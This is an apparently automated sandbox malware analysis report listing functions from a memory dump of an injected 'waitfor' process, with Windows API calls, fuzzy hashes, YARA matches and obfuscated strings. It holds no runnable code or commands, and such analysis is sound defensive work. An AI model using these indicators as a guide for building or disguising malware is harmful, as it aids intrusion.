                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                                                • Instruction ID: d512a95988a22c97c3bb30587de03a456fc8ea7c3ba967406f3121c93ffd84c5
                                                                                                                • Opcode Fuzzy Hash: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                                                • Instruction Fuzzy Hash: 0190022124545102F160715D44046264005ABE4205F56C131A08156B4D8555D9557222
                                                                                                                Function 00834050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0083412B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 73288cdb54e456943a48c4c3a3d075702e7d57b94dbab1cc51b91f27f45fb4ae
                                                                                                                • Instruction ID: 943a3017a7653799cd02c969bfa8e99d2ca794b40a3b3c09911a3fe8bca898eb
                                                                                                                • Opcode Fuzzy Hash: 73288cdb54e456943a48c4c3a3d075702e7d57b94dbab1cc51b91f27f45fb4ae
                                                                                                                • Instruction Fuzzy Hash: A4318DB1601605BBDB14DFA4D881FEBBBB8FB84700F04852CB619AB241D7706A808BE5
                                                                                                                Function 0082FABA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InitializeUninitialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                • Opcode ID: 36307bcf132f322dd814ac87ab71f71c2b76e3bfdef8077064c905a476448b2e
                                                                                                                • Instruction ID: 71b696cfc8869fb51fd029d3e599c39718c364732af91aab4898f97cc00c5297
                                                                                                                • Opcode Fuzzy Hash: 36307bcf132f322dd814ac87ab71f71c2b76e3bfdef8077064c905a476448b2e
                                                                                                                • Instruction Fuzzy Hash: 233133B6A00209AFDB00DFD8D8809EFB7B9FF88314B104569E505EB215D775EE45CBA1
                                                                                                                Function 0082FAC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InitializeUninitialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                • Opcode ID: da84a667bb23fcf9b955661ec973a05a2c7109393da0e43a05c345b9372e441b
                                                                                                                • Instruction ID: d09b258dcf1af602b17142bf659626fa9359429b9b8469efd4c1ce5a23a64d52
                                                                                                                • Opcode Fuzzy Hash: da84a667bb23fcf9b955661ec973a05a2c7109393da0e43a05c345b9372e441b
                                                                                                                • Instruction Fuzzy Hash: 253145B5A002099FDB00DFD8D8809EEB3B9FF88314B104569E505E7215D775EE45CBA0
                                                                                                                Function 00824AF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00824B62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction ID: f0b8f3962221a02927503d0a44f8ae191bda8fc3ac20295947dc26ceefbb5737
                                                                                                                • Opcode Fuzzy Hash: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                • Instruction Fuzzy Hash: E80112B5D0010DA7DB10DAE4DC46F9DB778EB54708F004195E909E7241F671EB54C791
                                                                                                                Function 00839E10 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,008288AE,00000010,?,?,?,00000044,?,00000010,008288AE,?,?,?), ref: 00839E73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 5418fe81db103e22020c5f43cee7c5163cd112f7e8d689d3e8e6b7be5240cd2f
                                                                                                                • Instruction ID: f5e60a6b658abd6a637626a1627905a7d005f32e8aa66b73f1a133f125c91ab1
                                                                                                                • Opcode Fuzzy Hash: 5418fe81db103e22020c5f43cee7c5163cd112f7e8d689d3e8e6b7be5240cd2f
                                                                                                                • Instruction Fuzzy Hash: DA0180B2214108BBCB44DE99DC91EDB77EDEF8C754F518208FA19E3241D634F8518BA5
                                                                                                                Function 00819EB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00819EF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 3ef242fbf2e0c03bbb6ef12702657e314d6c141ceca6c24fc91649880dbbe783
                                                                                                                • Instruction ID: ecfa7d37c6e2236f8677a07a46086db2bdaf32d11e9df2357bc3347b0bd3fd65
                                                                                                                • Opcode Fuzzy Hash: 3ef242fbf2e0c03bbb6ef12702657e314d6c141ceca6c24fc91649880dbbe783
                                                                                                                • Instruction Fuzzy Hash: 80F0307334430436E62061ADAC02FD7B25CEFC0B61F240065F70CEB181D996B44146E9
                                                                                                                Function 00819EAB Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00819EF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 85aa2a122ac4702988ca0f2824a5a322abfc4d2e36f23199dbb37aa731ec221b
                                                                                                                • Instruction ID: 2c9b19798bac0966a0e6868209d25c3ffedc23223752f49e4022701d1c831516
                                                                                                                • Opcode Fuzzy Hash: 85aa2a122ac4702988ca0f2824a5a322abfc4d2e36f23199dbb37aa731ec221b
                                                                                                                • Instruction Fuzzy Hash: 3CF06D7224470436E63071AD9C02FD7B29DEFC1B60F281025F70CEB2C1D996B84186EA
                                                                                                                Function 00839D90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D000003,00000007,00000000,00000004,00000000,00824363,000000F4), ref: 00839DC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
                                                                                                                • Instruction ID: 631ad8a1e3ada46b6dd061113cc23aee1dd07f3121b0a2a17f921c3295af683f
                                                                                                                • Opcode Fuzzy Hash: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
                                                                                                                • Instruction Fuzzy Hash: 0EE06D712002047FD614EE49DC41E9B37ADEFC5710F004408FA08E7241CA70B81187BA
                                                                                                                Function 00839D40 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00821FB6,?,00835C6B,00821FB6,00835C4F,00835C6B,?,00821FB6,00835C4F,00001000,?,?,00000000), ref: 00839D7C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
                                                                                                                • Instruction ID: b65fd7db62ebaeb3974b4d21aba7f67f3b18c2aa18b8dfc27ca2b7a11d3d3c12
                                                                                                                • Opcode Fuzzy Hash: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
                                                                                                                • Instruction Fuzzy Hash: C1E06D712002047FCA14EE49DC41E9B33ADEFC5B10F104019FA08E7241CA30B81186BA
                                                                                                                Function 008288F0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0082891C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 359d45252d29f3463ed6afae25e1f5ff0d2fb0827fae34e37f513185587fb962
                                                                                                                • Instruction ID: 5a420ff758423591cdac651881df053cb85b0ca925a66f2b1fa83b940f481047
                                                                                                                • Opcode Fuzzy Hash: 359d45252d29f3463ed6afae25e1f5ff0d2fb0827fae34e37f513185587fb962
                                                                                                                • Instruction Fuzzy Hash: C1E0267920030467EF206AA8FC82F7A335CFB88724F084661B95CDB2C7E939F9818191
                                                                                                                Function 008288ED Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0082891C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 2a9081c16a21871cca682601b80e266b0846887f52bfbaefc140890baf1e17bb
                                                                                                                • Instruction ID: 62f851e4eced27f3c50f396568dfda574e0ebe0c0e06b03984ea9285bdaaca33
                                                                                                                • Opcode Fuzzy Hash: 2a9081c16a21871cca682601b80e266b0846887f52bfbaefc140890baf1e17bb
                                                                                                                • Instruction Fuzzy Hash: FCE0D8B940030156EF105664BEC7B6A3A18FF44310F180655B86CDE1C7D538D5828215
                                                                                                                Function 008286DD Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,008222C0,0083858F,00835C4F,00822286), ref: 00828713
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: a3b806d4f3fd9cacd53c1a9ec1b2a1421df750f5d0eab2c1cde1d905bf672ed4
                                                                                                                • Instruction ID: 47a61d91a60cceeca80163d83592e9246f3658fcb3b875b1ecad593160315c13
                                                                                                                • Opcode Fuzzy Hash: a3b806d4f3fd9cacd53c1a9ec1b2a1421df750f5d0eab2c1cde1d905bf672ed4
                                                                                                                • Instruction Fuzzy Hash: 1CD02EB16403013BFB00A6A89C07F9A338DFB40704F448034BA0CE72C3F92AF01049AA
                                                                                                                Function 008286E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,008222C0,0083858F,00835C4F,00822286), ref: 00828713
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: 3bdad084bd72abf39ffa77e4b1132d9d3abbc2e3b7e4ba0b61e7fd5ca5f15466
                                                                                                                • Instruction ID: b844da1df8354731b0adc5f3ea8a703b0a026cce673ca2944902125fd9484083
                                                                                                                • Opcode Fuzzy Hash: 3bdad084bd72abf39ffa77e4b1132d9d3abbc2e3b7e4ba0b61e7fd5ca5f15466
                                                                                                                • Instruction Fuzzy Hash: EED05EB16403053BFA00A6A89C47F56328DEB54754F448064BA0CE76C3F96AF51145AA
                                                                                                                Function 0082138B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0082139D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                • Instruction ID: aae6d4c98356c566f3dafd7155c67568fe197c4131110bd70721405e722a4998
                                                                                                                • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                • Instruction Fuzzy Hash: 7BD0A772B4021C30EF2181546C46FFE7B6CDB51B40F100167FB04F41C1D684150506A6
                                                                                                                Function 047D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                                                • Instruction ID: 57df64a5c42254a19fc7cfeb81c6bc5aec495e8fdeadec86496b270deee7fe6a
                                                                                                                • Opcode Fuzzy Hash: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                                                • Instruction Fuzzy Hash: 9CB09B719015C5C5FB11F760460871779106BD0705F16C171D2070761F4738D5D5F176

                                                                                                                Non-executed Functions

                                                                                                                Function 04AB04CE Relevance: .1, Instructions: 148COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
                                                                                                                • Instruction ID: 8ebac0df834cb2a0601b41014dfd0da3115c9ad069d5488809598ff719ebce4c
                                                                                                                • Opcode Fuzzy Hash: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
                                                                                                                • Instruction Fuzzy Hash: 0741D27061CB0D4FE368AF6890816B7B3E6FB49304F50862DD9CAC3653EA70F8468685
                                                                                                                Function 04ABDFF9 Relevance: 56.5, Strings: 45, Instructions: 215COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                • API String ID: 0-3558027158
                                                                                                                • Opcode ID: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
                                                                                                                • Instruction ID: 7a8f2cd369b27b7399a6a88eb46b52cb8a96140b09e39db3164335e16fb74d4b
                                                                                                                • Opcode Fuzzy Hash: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
                                                                                                                • Instruction Fuzzy Hash: D89150F04482948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89098F85
                                                                                                                Function 04AB3C1E Relevance: 18.8, Strings: 15, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (b~$!!,b$!$&($&"dm$)":>$,?$b$bx~z$c||y$c~{m$m(.$xc}c$xc}m$x~zc${c|d$|t|{
                                                                                                                • API String ID: 0-2033398785
                                                                                                                • Opcode ID: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
                                                                                                                • Instruction ID: 2f58ef2477e5b09b070f7adf3361f43199ccaf7d0c634b070b8546db8e98bc2d
                                                                                                                • Opcode Fuzzy Hash: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
                                                                                                                • Instruction Fuzzy Hash: FB2144B080820CDBCB19CF84E5827DE7B71FF05704F909259E9496E246C7358254CB89
                                                                                                                Function 047D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                                                • Instruction ID: 22de4f3df5bf9cc9deb5cab215b5011425ceaee26e1401b045d01fdba9ab4f62
                                                                                                                • Opcode Fuzzy Hash: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                                                • Instruction Fuzzy Hash: 5D510AB1B14256BFDB20DFA9C88097EF7B8BB08204710C669E455E7746E274FE018BA0
                                                                                                                Function 04842410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                                                • Instruction ID: a71457b1bffb4751888cda59f66cb4077c03f57ffa54d9357fadc8f701a5e5ce
                                                                                                                • Opcode Fuzzy Hash: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                                                • Instruction Fuzzy Hash: A2510671A0464DAFDB30DE9CC89097FB7F8EF88244B008999F495D3641E6B4FA40CB60
                                                                                                                Function 047C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Execute=1, xrefs: 04804713
                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
                                                                                                                • ExecuteOptions, xrefs: 048046A0
                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                • API String ID: 0-484625025
                                                                                                                • Opcode ID: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                                                • Instruction ID: ab6313470633d02c2e18fa4962ecac7549c0efedb0c630b39e0a46002ea2eaa4
                                                                                                                • Opcode Fuzzy Hash: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                                                • Instruction Fuzzy Hash: 0A51167164021EABEF14AAA9DC89BA977B8EF04704F4405ADE605A7390EB70BE458F50
                                                                                                                Function 04866940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction ID: 92ab9a8e4ba637662a36ff7886ed40691e4ad024b1d7116561c6950694aa0936
